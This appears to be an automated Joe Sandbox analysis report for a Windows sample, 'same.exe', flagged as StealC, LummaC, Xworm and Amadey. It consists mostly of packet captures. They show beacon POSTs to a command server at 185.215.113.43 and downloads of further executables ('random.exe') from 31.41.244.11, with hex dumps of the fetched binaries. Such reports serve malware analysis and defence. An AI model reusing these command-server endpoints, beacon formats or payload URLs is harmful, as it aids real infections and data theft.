00 00 00 60 47 00 00 04 00 00 7f 3b 1d 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 60 02 00 69 00 00 00 00 c0 00 00 20 8b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 02 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PEL>og G @ `G;@U`i a N @.rsrc n@.idata `@ @*@emcbjfeu@,$@jhqzuixt G"@.taggant@ G"(@
Jan 3, 2025 15:22:07.578474045 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:22:07.578484058 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:22:07.578533888 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:22:07.578546047 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:22:07.578557014 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:22:07.578567982 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:22:07.578578949 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:22:07.578725100 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:22:07.578752041 CET	1236	IN	Data Raw: 1a d5 39 6a a2 b5 f5 e4 3d b7 06 88 0a a7 dc 88 11 86 1d 70 be de 16 71 cc d1 58 18 8d da a5 92 7a de 63 65 35 93 1d 8f fd 62 15 3e fb cb 60 f8 2a d8 25 74 05 1c 76 34 e9 d4 57 b8 60 5e 63 74 98 d5 6e 70 68 c2 36 80 93 d6 0b 69 90 9d c7 7a 37 d7 Data Ascii: 9j=pqXzce5b>`%tv4W`^ctnph6iz7hn0xc(ue60+^kf,T>cI{RU1or_qDqjT[7RvHu^wu)}mC?EV(&
Jan 3, 2025 15:22:07.583571911 CET	1236	IN	Data Raw: 00 b4 b3 79 5a 0c f8 4c 48 86 21 1c bd 45 1c 77 79 25 04 82 f6 c8 40 98 54 3a 54 aa 2a de 46 a2 33 8b f3 42 2f 6e 78 47 a2 c4 fe 91 4a 19 a7 8f 28 b8 12 3a 6d 72 44 6b 15 47 7c 99 6c b9 e0 73 d0 9f 68 89 fa 13 cc 8f 44 9e 6d 53 6c d8 fa ea bb 85 Data Ascii: yZLH!Ewy%@T:TF3B/nxGJ(:mrDkG\|lshDmSl9B*<F ,/dsP-@y-b?_@sn~G\|1{loZ4v4Qy0Yk=5<gC!yG7`u^kEd-XdcaxyAGv$sFjl>g

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 15:22:11.437907934 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 32 39 38 36 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1029869001&unit=246122658369
Jan 3, 2025 15:22:12.173979044 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Jan 2025 14:22:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 15:22:12.182553053 CET	62	OUT	GET /files/unique3/random.exe HTTP/1.1 Host: 31.41.244.11
Jan 3, 2025 15:22:12.879259109 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Jan 2025 14:22:12 GMT Content-Type: application/octet-stream Content-Length: 3185152 Last-Modified: Fri, 03 Jan 2025 13:57:17 GMT Connection: keep-alive ETag: "6777ecbd-309a00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 11 f0 76 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 48 04 00 00 ba 00 00 00 00 00 00 00 a0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 30 00 00 04 00 00 4f 69 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 59 80 05 00 6d 00 00 00 00 70 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELvgH0@0Oi1@Ymp ``@.rsrcpp@.idata t@fsfalnhv+*v@sinujova0t0@.taggant00"x0@
Jan 3, 2025 15:22:12.879281998 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:22:12.879296064 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:22:12.879307985 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:22:12.879389048 CET	1236	IN	Data Raw: b7 b7 cc c7 60 5f 6c 9e 73 b7 4a be 44 b7 e2 48 f3 c3 67 0c b8 3a a9 c6 b7 b7 65 05 b3 3e 01 b2 a7 f4 d7 c7 27 7b e2 48 f3 bb 67 0c b8 3b 11 c7 b7 b7 29 cc b7 b7 e2 cb f0 77 e6 ca b7 b7 e2 32 83 b6 e2 cb 5d c7 41 b7 b3 47 a7 cb 34 fb e6 46 f7 c4 Data Ascii: `_lsJDHg:e>'{Hg;)w2]AG4FfRw;se:#3>w)ww)wRpm7r:oAkJnHkRxx!`ezgBeJf
Jan 3, 2025 15:22:12.879404068 CET	1120	IN	Data Raw: 3e 14 6e d0 93 3e 3b e0 4a 6a e9 86 3e a5 6b 0f dc 71 93 30 51 f4 b6 e7 bf f4 d7 cb 27 7b e2 32 26 b7 e2 cb c8 6b 06 c8 dc 86 6d a0 93 bb 6b 09 b8 2d 26 7c df 27 d1 cb b7 38 27 c8 32 f7 b6 c1 71 40 9f e7 83 3e f6 cc 01 a5 97 33 2e 65 e2 cb 34 fb Data Ascii: >n>;Jj>kq0Q'{2&kmk-&\|'8'2q@>3.e42.>b!j@jPgCm{5gC342Ak>ejAAG40AG4x8'<y?UjKAy/8'k////ta8Oe
Jan 3, 2025 15:22:12.879415989 CET	1236	IN	Data Raw: 93 bb b7 06 c8 6b 06 c8 61 f4 b6 e7 87 df 49 b3 b7 b7 6d 78 93 c3 6d 90 93 a7 65 08 bb 3a 23 97 1f 40 a4 bb 3c ab 7a 31 b5 a6 38 76 df bf e2 cb b7 38 27 b8 69 94 9d 7e f4 40 af e7 b3 a6 22 47 fe 6b eb 48 4e bb e7 96 b4 40 a4 d3 f4 03 2f 10 fb 03 Data Ascii: kaImxme:#@<z18v8'i~@"GkHN@///ta8OA8G<k2Gae>3<4R@:eAS8K>{9U;vRsRM'GS<'GS<'GS<'zY>KsPKP<f!kPv/jDQvm/J&_
Jan 3, 2025 15:22:12.879429102 CET	1236	IN	Data Raw: b7 b7 6d 98 93 9f 98 33 ce 5b e2 cb 34 fb e6 52 b3 9b 92 75 df 53 e4 cb b7 38 27 d4 3c 8b 06 e8 3c 69 02 4f 69 f4 6b 15 34 e4 e3 52 73 9b e6 cc 34 4d e3 cb b7 32 42 1d c8 f4 6d 8a af b0 a4 bf 45 79 94 33 0a b6 e2 cb 34 fb e6 52 f6 2f 42 1d c8 f4 Data Ascii: m3[4RuS8'<<iOik4Rs4M2BmEy34R/BgBbAJfSHkmxmB>e4>e^A<yP}mk?@<Rn@>S<yP}k?@<PKR?B@R"I\|l%@>{R<'GS<'GS<'GS<'x3A> @
Jan 3, 2025 15:22:12.879446983 CET	1236	IN	Data Raw: b7 3e 1c 15 e6 98 ae e7 b3 3e 1d e9 63 9b d2 f2 fd ae 4c cd 34 21 e4 cb b7 b3 9e 96 93 c4 78 89 b6 38 23 fe 33 ef 95 cc 30 09 e4 cb b7 42 be ca c8 9b 67 60 51 7b e2 05 b1 99 4d 57 27 47 53 3c 27 b3 02 cd 35 2d e4 cb b7 3f e9 52 e8 e0 84 06 b1 a4 Data Ascii: >>cL4!x8#30Bg`Q{MW'GS<'5-?RM?0/B:fJbHg:pme#HlTKAKAKAKzAKlRJj7L7k}M:6A>+j>#47?7L7k8))
Jan 3, 2025 15:22:12.879460096 CET	1236	IN	Data Raw: b8 3b b9 ca b7 b7 7b 6d 1e 65 a0 52 ef ec 43 0b dd c0 cb 09 07 ca e2 cb 3e 0e 0c 0b dc 8a 52 3c 27 47 53 3c 27 47 53 3c 27 47 53 3c 27 40 af e7 b3 3e 2b f1 b3 9b e3 06 3e e7 7c 9b 37 bc 62 15 d5 3e 16 0b dc c4 6b 24 0d 66 62 c5 37 ec 44 b3 f4 e6 Data Ascii: ;{meRC>R<'GS<'GS<'GS<'@>+>\|7b>k$fb7DA(m'f8<>>Eac+>>%Us5-*xUs--1@>!B4i@>8
Jan 3, 2025 15:22:12.884316921 CET	1236	IN	Data Raw: c9 f4 41 79 61 df 51 d2 b7 b7 65 08 bf 3a 23 a4 90 3e d1 ab 34 f0 e5 96 ee 42 69 9a 25 b6 e2 04 71 9b e2 cb b7 b7 ca cb b7 b9 e2 b1 b7 87 4a 06 62 b7 e2 48 f3 c3 4d 62 3c 7d ce 32 0c f5 41 1d fb 03 2f 10 fb 03 2f 10 fb 8c 98 50 43 9b ee 50 71 6f Data Ascii: AyaQe:#>4Bi%qJbHMb<}2A//PCPqogCmN3R@2<mF;mo@>C3KiT{8'uI];>5omK>HIW"II#M\|//ta8O<cx<:ckm73<:kkoG'

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report same.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Xworm

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BFBAAFHD

C:\ProgramData\CAEHCFCBKKJDGCAKFCFI

C:\ProgramData\DHCAAEBKEGHJKEBFHJDB

C:\ProgramData\EBAFHCBFHDHCAAKFHDGDBKFCGC

C:\ProgramData\FIEHIIIJ

Windows Analysis Report
same.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 15:22:17.701455116 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 32 39 39 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1029919001&unit=246122658369
Jan 3, 2025 15:22:18.467467070 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Jan 2025 14:22:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 15:22:18.477742910 CET	58	OUT	GET /files/nsx/random.exe HTTP/1.1 Host: 31.41.244.11
Jan 3, 2025 15:22:19.161654949 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Jan 2025 14:22:19 GMT Content-Type: application/octet-stream Content-Length: 50265898 Last-Modified: Thu, 02 Jan 2025 16:23:47 GMT Connection: keep-alive ETag: "6776bd93-2feff2a" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5d 90 4e cd 19 f1 20 9e 19 f1 20 9e 19 f1 20 9e ad 6d d1 9e 15 f1 20 9e ad 6d d3 9e b2 f1 20 9e ad 6d d2 9e 01 f1 20 9e 22 af 23 9f 0b f1 20 9e 22 af 25 9f 04 f1 20 9e 22 af 24 9f 0b f1 20 9e c4 0e eb 9e 10 f1 20 9e 19 f1 21 9e 6d f1 20 9e 8b af 24 9f 08 f1 20 9e 8b af df 9e 18 f1 20 9e 8b af 22 9f 18 f1 20 9e 52 69 63 68 19 f1 20 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 a3 d3 11 5e 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 f0 01 00 00 14 02 00 00 00 00 00 d3 7c 00 00 00 10 00 00 00 00 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$]N m m m "# "% "$ !m $ " Rich PEL^"\|@@@d] @.text `.rdata@@.data@.gfids@@.rsrc]^@@.reloc @B
Jan 3, 2025 15:22:19.161673069 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 e8 f0 88 00 00 8b f0 e8 e3 88 00 00 ff 36 ff 30 e8 8a 3a 00 00 8b Data Ascii: V60:V0^8VW\|$HwjPuhB&3_^8D$DwD$,D$0D$4D$iwD$t$ij8D$D
Jan 3, 2025 15:22:19.161760092 CET	1236	IN	Data Raw: 24 0c 68 3c 02 42 00 50 e8 5e 58 00 00 83 c4 0c 85 c0 78 42 8d 44 24 08 6a 04 50 e8 8b 3f 00 00 83 c4 08 85 c0 78 15 8d 44 24 08 50 e8 0a 57 00 00 83 c4 04 8b c6 5f 5e 83 c4 38 c3 ff 74 24 20 50 68 44 02 42 00 e8 90 09 00 00 83 c4 0c 33 c0 5f 5e Data Ascii: $h<BP^XxBD$jP?xD$PW_^8t$ PhDB3_^8t$ Ph`Bv3_^8QVt$jjD$606D$jjP5fD$(<MZjj<66D$jjPD$ jP66D$8jj
Jan 3, 2025 15:22:19.161771059 CET	224	IN	Data Raw: c4 08 89 06 85 c0 0f 84 8b 00 00 00 56 e8 95 fb ff ff 83 c4 04 83 f8 01 7d 15 6a 02 6a 00 ff 36 e8 cb 8d 00 00 ff 36 e8 36 93 00 00 83 c4 10 50 56 e8 21 fe ff ff 83 c4 08 83 f8 ff 74 59 ff 76 24 c7 86 6c 40 00 00 00 00 00 00 e8 95 64 00 00 6a 00 Data Ascii: V}jj666PV!tYv$l@djTBvdFP6v pdPgFuhLBhpB^6jv =dPvTshxBhB^v dF6F
Jan 3, 2025 15:22:19.161794901 CET	1236	IN	Data Raw: e8 29 87 00 00 83 c4 04 85 c0 74 12 68 9c 03 42 00 e8 a1 03 00 00 83 c4 04 83 c8 ff 5e c3 56 e8 83 fb ff ff 83 c4 04 33 c0 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc 53 8b 5c 24 0c 55 56 68 00 10 00 00 53 e8 d6 82 00 00 8b 6c 24 20 8b f0 68 00 10 Data Ascii: )thB^V3^S\$UVhSl$ hU@=v^][W\|$Wh+IDuEEu+GGul$h+_[Luh0h@+@Lu^]3[
Jan 3, 2025 15:22:19.161838055 CET	1236	IN	Data Raw: 00 8d 84 24 18 08 00 00 56 50 e8 f4 31 00 00 83 c4 18 85 c0 74 46 68 00 04 00 00 8d 44 24 0c 57 50 e8 dd 31 00 00 83 c4 0c 8d 44 24 08 ff b4 24 18 10 00 00 50 8d 84 24 10 08 00 00 50 6a 00 ff 15 80 01 42 00 5f 5e 8b 8c 24 00 10 00 00 33 cc e8 e2 Data Ascii: $VP1tFhD$WP1D$$P$PjB_^$3^$WVjB$_^3^P^B3$P$PS$PVPD$3P$ PSu^[$P3M^PW
Jan 3, 2025 15:22:19.161849976 CET	1236	IN	Data Raw: 8b 74 24 08 56 e8 45 1c 00 00 83 c4 04 83 f8 ff 75 04 0b c0 5e c3 ff 74 24 10 8d 86 68 20 00 00 50 ff 74 24 14 e8 f5 1a 00 00 40 83 c4 0c f7 d8 1b c0 f7 d8 48 5e c3 cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 8b 77 08 3b 77 0c 73 51 8b 5c 24 14 Data Ascii: t$VEu^t$h Pt$@H^SVW\|$w;wsQ\$N:utQ:Puu3uVWuVW;wr_^3[_^[Vt$Vt^Vl@uVuV
Jan 3, 2025 15:22:19.161861897 CET	672	IN	Data Raw: 40 01 88 4c 02 ff 84 c9 75 f3 38 0f 74 1d 38 0e 74 19 5f 33 c0 5e 8b 8c 24 04 10 00 00 33 cc e8 6b 55 00 00 81 c4 08 10 00 00 c3 8b 8c 24 0c 10 00 00 83 c8 ff 5f 5e 33 cc e8 51 55 00 00 81 c4 08 10 00 00 c3 cc cc cc cc cc cc b8 08 30 00 00 e8 56 Data Ascii: @Lu8t8t_3^$3kU$_^3QU0VUB3$0V$0Wjjt$Phx@ju,hBhBu_^$03T0S6$P$P$ PC$ PD$
Jan 3, 2025 15:22:19.161871910 CET	1236	IN	Data Raw: 00 00 8d 44 24 14 0f 45 c6 50 68 dc 05 42 00 e8 57 1c 00 00 68 dc 05 42 00 e8 fd 16 00 00 57 e8 17 5b 00 00 83 c4 10 83 f8 ff 75 05 83 c8 ff eb 3a e8 75 6c 00 00 ff 74 24 10 8d 84 24 18 10 00 00 55 57 50 e8 92 1c 00 00 83 c4 10 8b d8 83 bf 68 40 Data Ascii: D$EPhBWhBW[u:ult$$UWPh@uV^W$0][_^3rR0D$Vt$+@LuQAu+D1pkg^ 6RB3$ V$ D$h
Jan 3, 2025 15:22:19.161885023 CET	1236	IN	Data Raw: 68 ec 07 42 00 56 ff d7 a3 74 c9 42 00 85 c0 75 18 68 04 08 42 00 68 bc 06 42 00 e8 97 ec ff ff 83 c4 08 83 c8 ff 5f 5e c3 68 38 08 42 00 56 ff d7 a3 60 c9 42 00 85 c0 75 18 68 48 08 42 00 68 bc 06 42 00 e8 6e ec ff ff 83 c4 08 83 c8 ff 5f 5e c3 Data Ascii: hBVtBuhBhB_^h8BV`BuhHBhBn_^htBVhBuhBhBE_^hBVBuhBhB_^hBVBuhBhB_^h BV\|Buh,BhB
Jan 3, 2025 15:22:19.166661978 CET	1236	IN	Data Raw: 68 bc 06 42 00 e8 d9 e7 ff ff 83 c4 08 83 c8 ff 5b 5f 5e c3 5b 5f 33 c0 5e c3 cc cc cc cc cc cc cc cc cc ff 25 e0 c9 42 00 cc cc cc cc cc cc cc cc cc cc ff 25 9c c9 42 00 cc cc cc cc cc cc cc cc cc cc ff 25 98 c9 42 00 cc cc cc cc cc cc cc cc cc Data Ascii: hB[_^[_3^%B%B%B%B%BVW\|$tfPjFvuWj_^D$l@u%\|B=dCSVW\|$tAjh0PjuhXB

Timestamp	Bytes transferred	Direction	Data
2025-01-03 14:21:03 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 50 66 75 53 36 46 51 62 5a 45 57 69 2b 76 39 57 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 37 36 63 63 33 31 64 33 63 35 39 62 35 32 64 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: PfuS6FQbZEWi+v9W.1Context: e76cc31d3c59b52d
2025-01-03 14:21:03 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-03 14:21:03 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 50 66 75 53 36 46 51 62 5a 45 57 69 2b 76 39 57 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 37 36 63 63 33 31 64 33 63 35 39 62 35 32 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 51 67 34 62 35 38 63 53 30 56 55 49 44 6e 74 37 30 6a 74 4a 77 33 52 6f 42 41 57 50 58 6b 44 58 37 55 5a 6d 62 6f 64 76 54 4d 78 72 37 66 78 5a 4b 69 4f 57 66 37 54 33 35 6e 79 79 68 4f 6a 43 50 4b 4f 5a 36 77 65 52 54 2b 68 2f 4f 39 77 42 31 2b 76 34 56 67 63 38 31 2b 4b 70 39 62 61 69 54 69 42 54 50 67 72 70 62 45 4c 66 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: PfuS6FQbZEWi+v9W.2Context: e76cc31d3c59b52d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaQg4b58cS0VUIDnt70jtJw3RoBAWPXkDX7UZmbodvTMxr7fxZKiOWf7T35nyyhOjCPKOZ6weRT+h/O9wB1+v4Vgc81+Kp9baiTiBTPgrpbELf
2025-01-03 14:21:03 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 50 66 75 53 36 46 51 62 5a 45 57 69 2b 76 39 57 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 37 36 63 63 33 31 64 33 63 35 39 62 35 32 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: PfuS6FQbZEWi+v9W.3Context: e76cc31d3c59b52d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode 